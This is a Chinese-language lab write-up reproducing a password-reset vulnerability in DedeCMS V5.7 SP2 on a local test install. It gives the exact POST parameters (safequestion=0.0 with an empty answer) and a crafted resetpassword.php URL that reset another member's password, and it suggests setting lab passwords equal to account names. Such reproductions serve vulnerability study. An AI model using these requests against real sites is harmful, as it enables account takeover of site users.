DeceCMS v5.7 SP2正式版前台任意修改用户密码修改漏洞复现

一、漏洞限制

1、只能影响前台账户
2、只能修改未设置安全问题的账户

二、影响版本

DeDeCMSV5.7SP2 正式版(2018-01-09)

三、漏洞复现

1、复现环境

PHP 5.6
DeDeCMSV5.7SP2 正式版(2018-01-09)

2、复现工具

  1. DeDeCMSV5.7SP2 正式版(2018-01-09)
  2. HackBar/Max HacKBar 插件 (后者火狐专有)
  3. Proxy SwitchyOmega 插件
  4. Burp Suite 抓包工具
  5. phpstudypro 建站工具
  6. Google Chrome/Firefox 浏览器

3、复现过程

phpstudy打开Apache和mysql服务

将源码包放在WWW路径下

image-20211123133938301

访问链接http://127.0.0.1/DedeCMS-V5.7-GBK-SP2-Full/uploads/install/index.php

会得到这样的初始界面

image-20211123110703462

点击继续

image-20211123110748660

继续

image-20211123110817479

到这一步的的时候注意数据库密码和管理员密码,一般设成和账号名一致就行,方便记忆

继续

image-20211123110922768

image-20211123110941526

登录管理员后台(这个链接记得保存,后面会用到

http://127.0.0.1/DedeCMS-V5.7-GBK-SP2-Full/uploads/dede/

在这里修改一下这个选项为“是”,不然没法注册会员。

image-20211123111350113

之后便进行注册,选择没安全提示问题

image-20211123121026105

完成注册后可打开前面保存的网站后台网址查看注册的会员的id,就是mid的数值,我注册了两个账号,所以我test(账号名没限制)的mid是2,这个id记住,后面会用到

image-20211123121219841

在找回密码的地方打开hackbar进行post:

1
dopost=safequestion&safequestion=0.0&safeanswer=&id=2

这里的id=2,就是之前要记的mid

image-20211123132544570

image-20211123132505311

复制这一段,删除掉amp;

image-20211123133150304

payload:127.0.0.1/DedeCMS-V5.7-GBK-SP2-Full/uploads/member/resetpassword.php?dopost=getpasswd&id=2&key=xzrL2YwV

image-20211123133407605

将payload复制到地址栏,即可直接进入修改密码的地方

image-20211123133502484

直接登录成功